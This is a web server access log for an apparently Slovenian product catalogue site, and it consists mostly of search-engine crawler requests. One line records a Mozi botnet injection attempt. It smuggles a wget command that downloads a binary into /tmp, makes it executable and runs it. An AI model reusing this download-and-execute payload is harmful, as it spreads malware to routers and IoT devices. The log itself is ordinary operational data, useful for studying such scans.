66.249.66.44 - - [02/Oct/2024:23:00:33 +0200] "GET /skupine.php?skupina=55 HTTP/1.1" 200 22068 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:23:00:33 +0200] "GET /info.php?sifra=KE40&skupina=136 HTTP/1.1" 200 17065 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:08:35 +0200] "GET /info.php?sifra=K202&skupina=136 HTTP/1.1" 200 17006 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:08:36 +0200] "GET /skupine.php?skupina=136&stran=1 HTTP/1.1" 200 24920 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:09:36 +0200] "GET /skupine.php?skupina=136&stran=2 HTTP/1.1" 200 22689 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:13:37 +0200] "GET /info.php?sifra=95SNS&skupina=136 HTTP/1.1" 200 17042 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [02/Oct/2024:23:13:38 +0200] "GET /info.php?sifra=95DNS&skupina=136 HTTP/1.1" 200 17045 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
207.46.13.36 - - [02/Oct/2024:23:16:51 +0200] "GET /metra_logo_01a.gif HTTP/1.1" 200 7126 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
66.249.66.42 - - [02/Oct/2024:23:21:38 +0200] "GET /skupine.php?skupina=42&stran=1 HTTP/1.1" 200 26562 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:23:39 +0200] "GET /info.php?sifra=7212&skupina=42 HTTP/1.1" 200 18602 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [02/Oct/2024:23:33:39 +0200] "GET /skupine.php?skupina=42&stran=2 HTTP/1.1" 200 26392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [02/Oct/2024:23:38:39 +0200] "GET /skupine.php?skupina=42&stran=3 HTTP/1.1" 200 26436 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:00:06:41 +0200] "GET /skupine.php?skupina=106 HTTP/1.1" 200 23264 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:00:18:42 +0200] "GET /info.php?sifra=1003031&skupina=42 HTTP/1.1" 200 18590 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
177.124.25.20 - - [03/Oct/2024:01:29:46 +0200] "GET / HTTP/1.1" 200 20819 "-" "-"
66.249.66.44 - - [03/Oct/2024:01:37:29 +0200] "GET /skupine.php?skupina=104 HTTP/1.1" 200 14391 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:43:00 +0200] "GET /skupine.php?skupina=32&stran=2 HTTP/1.1" 200 18907 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:44:29 +0200] "GET /info.php?sifra=1003026&skupina=42 HTTP/1.1" 200 18540 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:50:31 +0200] "GET /info.php?sifra=1003032&skupina=42 HTTP/1.1" 200 18667 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:01:56:33 +0200] "GET /skupine.php?skupina=105 HTTP/1.1" 200 18656 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:02:28:41 +0200] "GET /skupine.php?skupina=42&stran=4 HTTP/1.1" 200 26587 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:02:39:41 +0200] "GET /info.php?sifra=50016&skupina=42 HTTP/1.1" 200 18514 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:02:44:42 +0200] "GET /skupine.php?skupina=81 HTTP/1.1" 200 25392 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:02:47:42 +0200] "GET /skupine.php?skupina=44 HTTP/1.1" 200 26225 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:03:46:30 +0200] "GET /info.php?sifra=281565&skupina=103 HTTP/1.1" 200 17643 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:03:51:31 +0200] "GET /info.php?sifra=52562&skupina=63 HTTP/1.1" 200 17186 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:03:55:54 +0200] "GET /skupine.php?skupina=51 HTTP/1.1" 200 18377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:03:58:33 +0200] "GET /info.php?sifra=48218&skupina=63 HTTP/1.1" 200 17151 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:03:59:33 +0200] "GET /skupine.php?skupina=63&stran=1 HTTP/1.1" 200 24960 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:04:04:34 +0200] "GET /skupine.php?skupina=63&stran=2 HTTP/1.1" 200 20507 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
198.235.24.84 - - [03/Oct/2024:04:05:07 +0200] "\x16\x03\x01" 200 20819 "-" "-"
198.235.24.84 - - [03/Oct/2024:04:05:08 +0200] "\x16\x03\x01" 200 20819 "-" "-"
66.249.66.44 - - [03/Oct/2024:04:20:29 +0200] "GET /slike/16.010-2.jpg HTTP/1.1" 200 7212 "-" "Googlebot-Image/1.0"
66.249.66.43 - - [03/Oct/2024:04:20:34 +0200] "GET /info.php?sifra=52564&skupina=63 HTTP/1.1" 200 17191 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:04:21:35 +0200] "GET /info.php?sifra=44051&skupina=63 HTTP/1.1" 200 17440 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
162.216.150.168 - - [03/Oct/2024:04:32:02 +0200] "GET / HTTP/1.1" 200 20819 "-" "Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers' presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com"
66.249.66.43 - - [03/Oct/2024:04:50:38 +0200] "GET /info.php?sifra=308048&skupina=63 HTTP/1.1" 200 17390 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:04:50:39 +0200] "GET /info.php?sifra=kos002&skupina=134 HTTP/1.1" 200 17510 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:05:06:41 +0200] "GET /info.php?sifra=kos%20001&skupina=134 HTTP/1.1" 200 17673 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:05:10:41 +0200] "GET /info.php?sifra=50151&skupina=40 HTTP/1.1" 200 17634 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:05:12:41 +0200] "GET /skupine.php?skupina=40&stran=3 HTTP/1.1" 200 25418 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:05:15:42 +0200] "GET /skupine.php?skupina=40&stran=1 HTTP/1.1" 200 25452 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:05:15:43 +0200] "GET /info.php?sifra=50051&skupina=40 HTTP/1.1" 200 17535 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:05:21:43 +0200] "GET /info.php?sifra=56151&skupina=40 HTTP/1.1" 200 17481 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:05:30:44 +0200] "GET /info.php?sifra=50451&skupina=40 HTTP/1.1" 200 17592 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:05:48:44 +0200] "GET /info.php?sifra=08068&skupina=85 HTTP/1.1" 200 18847 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:05:48:45 +0200] "GET /info.php?sifra=16878&skupina=85 HTTP/1.1" 200 18842 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
125.42.121.223 - - [03/Oct/2024:05:53:25 +0200] "27;wget%20http://%s:%d/Mozi.m%20-O%20->%20/tmp/Mozi.m;chmod%20777%20/tmp/Mozi.m;/tmp/Mozi.m%20dlink.mips%27$ HTTP/1.0" 400 226 "-" "-"
66.249.66.43 - - [03/Oct/2024:05:58:46 +0200] "GET /info.php?sifra=236&skupina=89 HTTP/1.1" 200 18719 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:16:46 +0200] "GET /info.php?sifra=cs2234&skupina=89 HTTP/1.1" 200 18732 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:25:01 +0200] "GET /skupine.php?skupina=100&stran=2 HTTP/1.1" 200 25538 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:25:47 +0200] "GET /skupine.php?skupina=133 HTTP/1.1" 200 17753 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:35:24 +0200] "GET /pozabljenogeslo.php HTTP/1.1" 200 17176 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:35:25 +0200] "GET /info.php?sifra=2RPP&skupina=31 HTTP/1.1" 200 17716 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:37:26 +0200] "GET /skupine.php?skupina=31&stran=4 HTTP/1.1" 200 25886 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:37:27 +0200] "GET /skupine.php?skupina=31&stran=2 HTTP/1.1" 200 25884 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:06:39:28 +0200] "GET /skupine.php?skupina=31&stran=3 HTTP/1.1" 200 25948 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:39:28 +0200] "GET /skupine.php?skupina=82&stran=2 HTTP/1.1" 200 27376 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:06:41:29 +0200] "GET /info.php?sifra=252150&skupina=82 HTTP/1.1" 200 18954 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:06:42:29 +0200] "GET /skupine.php?skupina=82&stran=1 HTTP/1.1" 200 27505 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:06:44:29 +0200] "GET /skupine.php?skupina=82&stran=3 HTTP/1.1" 200 27291 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:07:13:44 +0200] "GET /skupine.php?skupina=82&stran=5 HTTP/1.1" 200 27860 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:13:45 +0200] "GET /info.php?sifra=MC2131&skupina=82 HTTP/1.1" 200 19159 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:16:45 +0200] "GET /skupine.php?skupina=82&stran=6 HTTP/1.1" 200 23526 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:07:17:46 +0200] "GET /info.php?sifra=dbm020&skupina=82 HTTP/1.1" 200 19195 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:30:46 +0200] "GET /skupine.php?skupina=82&stran=4 HTTP/1.1" 200 27543 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:07:33:50 +0200] "GET /info.php?sifra=064022&skupina=124 HTTP/1.1" 200 17400 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:07:41:51 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:41:51 +0200] "GET /skupine.php?skupina=126 HTTP/1.1" 200 15734 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:07:44:51 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:44:51 +0200] "GET /skupine.php?skupina=125 HTTP/1.1" 200 13595 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.42 - - [03/Oct/2024:07:50:52 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:50:52 +0200] "GET /skupine.php?skupina=31&stran=5 HTTP/1.1" 200 23607 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:07:50:53 +0200] "GET /info.php?sifra=4RM&skupina=31 HTTP/1.1" 200 17708 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
50.3.85.66 - - [03/Oct/2024:07:51:58 +0200] "POST / HTTP/1.1" 200 20819 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36"
66.249.66.43 - - [03/Oct/2024:07:53:53 +0200] "GET /skupine.php?skupina=46 HTTP/1.1" 200 25377 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:08:01:54 +0200] "GET /info.php?sifra=4RTO83&skupina=31 HTTP/1.1" 200 17779 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:01:55 +0200] "GET /info.php?sifra=4RPP&skupina=31 HTTP/1.1" 200 17705 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:02:55 +0200] "GET /skupine.php?skupina=31&stran=1 HTTP/1.1" 200 25697 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:03:55 +0200] "GET /skupine.php?skupina=39 HTTP/1.1" 200 25623 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:13:56 +0200] "GET /skupine.php?skupina=32 HTTP/1.1" 200 25473 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:25:56 +0200] "GET /skupine.php?skupina=0 HTTP/1.1" 200 25527 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.44 - - [03/Oct/2024:08:31:57 +0200] "GET /skupine.php?skupina=124 HTTP/1.1" 200 15662 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.89 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.249.66.43 - - [03/Oct/2024:09:11:59 +0200] "GET /info.php?sifra=28515&skupina=82 HTTP/1.1" 200 19129 "-" "Mozilla/5.0 (Linux; Android 6.0.1; Nexus 5X Build/MMB29P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.70 Mobile Safari/537.36 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
